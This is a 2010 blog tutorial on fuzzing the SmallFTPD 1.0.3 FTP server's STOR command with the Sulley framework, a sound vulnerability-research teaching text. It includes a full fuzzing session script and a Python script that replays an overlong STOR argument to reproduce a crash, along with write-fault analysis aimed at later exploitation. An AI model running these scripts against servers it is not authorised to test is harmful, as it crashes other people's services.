
Fuzzing 101 with Sulley

May 16, 2010 in Security


Using Sulley to Find Exploits

Overview:
Sulley is a fuzzing framework well suited to finding bugs and overflows in applications that could allow remote exploitation. The official description:

Sulley – http://code.google.com/p/sulley/ Sulley is a fuzzer development and fuzz testing framework consisting of multiple extensible components. Sulley (IMHO) exceeds the capabilities of most previously published fuzzing technologies, commercial and public domain. The goal of the framework is to simplify not only data representation but to simplify data transmission and target monitoring as well.

To install: svn checkout http://sulley.googlecode.com/svn/trunk/ Sulley (the Google Code repository is no longer online; the code is now maintained at https://github.com/OpenRCE/sulley, and its actively developed successor is boofuzz. Sulley itself runs on Python 2.)

How to:

Step 1) Create the Sulley Grammar

In this example I target a small FTP server, SmallFTPD FTP Server version 1.0.3 (http://smallftpd.sourceforge.net/).

First, make a valid FTP connection by hand and capture it in Wireshark, so you can see every request and response needed to reach the command you want to fuzz.

Once you have the protocol basics down, you need to build a Sulley grammar, which defines how the Python script will talk to the FTP service. Here is how I configured mine:

The full grammar was provided as ftp.txt (linked from the original post).

The code itself should be self-explanatory, but it is important to know exactly which fields get fuzzed. In this case we fuzz the argument of the FTP STOR command; everything marked s_static is sent unchanged, and only the s_string primitive is mutated:

from sulley import *

s_initialize("stor")
s_static("STOR")        # command verb, never mutated
s_delim(" ")            # delimiter (Sulley mutates delimiters too unless fuzzable=False)
s_string("AAAA")        # this field will be fuzzed
s_static("\r\n")        # line terminator, never mutated

The best thing about Sulley is that, during the fuzzing process, if the target crashes the process monitor agent will kill any hung instance, restart the program and keep fuzzing. This is where you tell it which process to watch and how to stop and start it:

target.procmon_options = {
    "proc_name"      : "smallftpd.exe",
    "stop_commands"  : ['wmic process where (name="smallftpd.exe") delete'],
    "start_commands" : ['C:\\Documents and Settings\\Administrator\\Desktop\\smallftpd-1.0.3-fix\\smallftpd.exe'],
}

Step 2) I also started the process monitor agent on the target machine (C:\sulley>python process_monitor.py -c c:\smallftpd.crash -p "smallftpd.exe"). The agent attaches to the named process, detects faults, and stores detailed crash information (registers, disassembly, stack) in the crash bin given with -c; the fuzzing script talks to it over its RPC port (26002 by default).

Step 3) With the grammar complete and the process monitor agent running, I open smallftpd, create a user and password both named ftp, and start the service. Once the FTP server is up, I run the Python/Sulley script.
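Putting steps 1 to 3 together, here is a complete Sulley session script for the STOR fuzz. This is an added example, not the ftp.txt script from the original post; it assumes the FTP server and process_monitor.py run on the same box as the fuzzer (127.0.0.1, procmon on its default port 26002), the ftp/ftp account from the post, the same smallftpd.exe path as the post, and an existing audits directory for the session file. The Sulley imports are done inside the functions so the module loads without Sulley for the helper alone; the session itself needs Sulley under Python 2.

```python
"""Complete Sulley session for the SmallFTPD STOR fuzz described above.

Added example, not the original post's ftp.txt. Assumptions: Sulley
(Python 2) installed; target and process_monitor.py on 127.0.0.1; the
'ftp'/'ftp' account created in the SmallFTPD GUI; an 'audits' directory
exists for the session file.
"""

TARGET_HOST = "127.0.0.1"   # assumption: fuzzer and target on one machine
TARGET_PORT = 21
PROCMON_PORT = 26002        # process_monitor.py default RPC port
# Assumption: same install path as the original post.
SMALLFTPD_EXE = r"C:\Documents and Settings\Administrator\Desktop\smallftpd-1.0.3-fix\smallftpd.exe"


def procmon_options(exe_path, proc_name="smallftpd.exe"):
    """Stop/start instructions the process monitor agent runs after a crash.

    The wmic command is one string; the double quotes around the process
    name belong to the WQL filter and must survive Python's own quoting.
    """
    return {
        "proc_name": proc_name,
        "stop_commands": ['wmic process where (name="%s") delete' % proc_name],
        "start_commands": [exe_path],
    }


def define_requests():
    """Grammar: USER and PASS are fully static, only the STOR argument is
    fuzzed. Delimiters are pinned with fuzzable=False where they must not
    be mutated, because Sulley fuzzes s_delim by default."""
    from sulley import s_initialize, s_static, s_delim, s_string

    s_initialize("user")
    s_static("USER")
    s_delim(" ", fuzzable=False)
    s_static("ftp")          # account created in the SmallFTPD GUI
    s_static("\r\n")

    s_initialize("pass")
    s_static("PASS")
    s_delim(" ", fuzzable=False)
    s_static("ftp")
    s_static("\r\n")

    s_initialize("stor")
    s_static("STOR")
    s_delim(" ")
    s_string("AAAA")         # the fuzzed primitive
    s_static("\r\n")


def build_session(session_file="audits/smallftpd_stor.session"):
    """Wire the requests into a session graph with a procmon-backed target."""
    from sulley import sessions, pedrpc, s_get

    define_requests()
    sess = sessions.session(session_filename=session_file)
    target = sessions.target(TARGET_HOST, TARGET_PORT)
    target.procmon = pedrpc.client(TARGET_HOST, PROCMON_PORT)
    target.procmon_options = procmon_options(SMALLFTPD_EXE)
    sess.add_target(target)

    # Request graph USER -> PASS -> STOR: Sulley replays the path to a node
    # before sending each mutation, so every STOR case is sent logged in.
    sess.connect(s_get("user"))
    sess.connect(s_get("user"), s_get("pass"))
    sess.connect(s_get("pass"), s_get("stor"))
    return sess


if __name__ == "__main__":
    build_session().fuzz()   # progress at http://127.0.0.1:26000
```

The login requests are fully static so that a mutated USER or PASS never masks the STOR results; if you later want to fuzz them, swap the relevant s_static for s_string and Sulley walks the extra nodes automatically.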

[screenshot: sulley_running]

The screenshot above shows the test cases Sulley iterates through. You can also open a browser at http://127.0.0.1:26000 (Sulley's built-in web interface) to see the same output; the page does not auto-refresh, so reload it manually to see updates. After about two minutes of running, test case 39 caused an access violation:

000039 :00401f2c mov byte [eax],0x0 from thread 4944 caused access violation

[screenshot: sulley_http]

Looking further into the crash, the instruction at EIP (0x00401f2c, mov byte [eax],0x0) tried to write a zero byte to the address held in EAX, which was 0xffffffff, an unmapped address, hence the violation. A write through a pointer that now holds an attacker-influenced value is the classic sign that the long STOR argument overflowed a buffer and corrupted adjacent data; a write fault is also more promising for exploitation than a read fault.
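Once the agent reports a faulting test case, the next two things a practitioner does are to triage the crash summary line (is it a read or a write, at what EIP) and to reproduce it outside the fuzzer. The following is an added example, not code from the original post or from Sulley: it parses the crash summary format shown above and replays a single STOR request over a plain socket. It assumes the ftp/ftp account and 127.0.0.1:21 from the post; the 3000-byte payload length is an assumption, the real test-case string comes from Sulley's web UI or the .session file. The FakeFtpServer is a constructed stand-in so the script runs offline.

```python
"""Triage a Sulley crash summary line and replay one STOR payload by hand.

Added example, not from the original post or from Sulley. Assumes the
crash summary format shown above and a USER/PASS login before STOR.
"""
import re
import socket
import sys

CRASH_LINE = re.compile(
    r"^(?P<case>\d+)\s*:(?P<eip>[0-9a-fA-F]{8})\s+(?P<insn>.+?)\s+"
    r"from thread (?P<tid>\d+) caused (?P<reason>.+)$"
)


def parse_crash_line(line):
    """Split '000039 :00401f2c mov byte [eax],0x0 from thread 4944 caused
    access violation' into fields; returns None for non-matching lines."""
    m = CRASH_LINE.match(line.strip())
    if m is None:
        return None
    return {
        "case": int(m.group("case")),
        "eip": int(m.group("eip"), 16),
        "insn": m.group("insn"),
        "tid": int(m.group("tid")),
        "reason": m.group("reason"),
    }


def fault_kind(insn):
    """Heuristic: a memory operand as the destination (first operand)
    means the faulting instruction was a write, otherwise a read."""
    parts = insn.split(None, 1)
    if len(parts) < 2:
        return "unknown"
    dest = parts[1].split(",")[0]
    return "write" if "[" in dest else "read"


def replay_stor(sock, payload, user=b"ftp", password=b"ftp"):
    """Log in and send one STOR request. Returns (replies, alive); alive is
    False when the server closed or reset the connection, which is how a
    crashed SmallFTPD looks from the client side."""
    replies = []
    try:
        replies.append(sock.recv(4096))                        # 220 banner
        for cmd in (b"USER " + user, b"PASS " + password, b"STOR " + payload):
            sock.sendall(cmd + b"\r\n")
            data = sock.recv(4096)
            if not data:                                       # orderly close
                return replies, False
            replies.append(data)
    except socket.error:                                       # RST / timeout
        return replies, False
    return replies, True


class FakeFtpServer(object):
    """Constructed stand-in for a socket: answers from a canned list and
    returns b'' (connection closed) once the list is exhausted."""
    def __init__(self, responses):
        self.sent = []
        self._responses = list(responses)

    def sendall(self, data):
        self.sent.append(data)

    def recv(self, _bufsize):
        return self._responses.pop(0) if self._responses else b""


def replay_over_network(host, port, payload, timeout=5.0):
    """Reproduction against a live server."""
    sock = socket.create_connection((host, port), timeout)
    try:
        return replay_stor(sock, payload)
    finally:
        sock.close()


if __name__ == "__main__":
    info = parse_crash_line(
        "000039 :00401f2c mov byte [eax],0x0 from thread 4944 caused access violation")
    print("test case %d faulted at 0x%08x on a %s: %s" %
          (info["case"], info["eip"], fault_kind(info["insn"]), info["insn"]))

    payload = b"A" * 3000                                      # assumed length
    if len(sys.argv) > 2:                                      # host port given
        replies, alive = replay_over_network(sys.argv[1], int(sys.argv[2]), payload)
    else:                                                      # offline demo
        fake = FakeFtpServer([b"220 smallftpd\r\n", b"331 \r\n", b"230 \r\n"])
        replies, alive = replay_stor(fake, payload)
    print("server alive after STOR: %s (%d replies)" % (alive, len(replies)))
```

Run it with a host and port to replay against the real server; with the process monitor agent still attached you get the same crash bin entry, which confirms the bug is deterministic before any exploitation work starts.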

[screenshot: sulley_output]

A future article will take this overflow to exploitation…

For more information see the Sulley API documentation:
www.fuzzing.org/wp-content/SulleyEpyDoc/public/sulley-module.html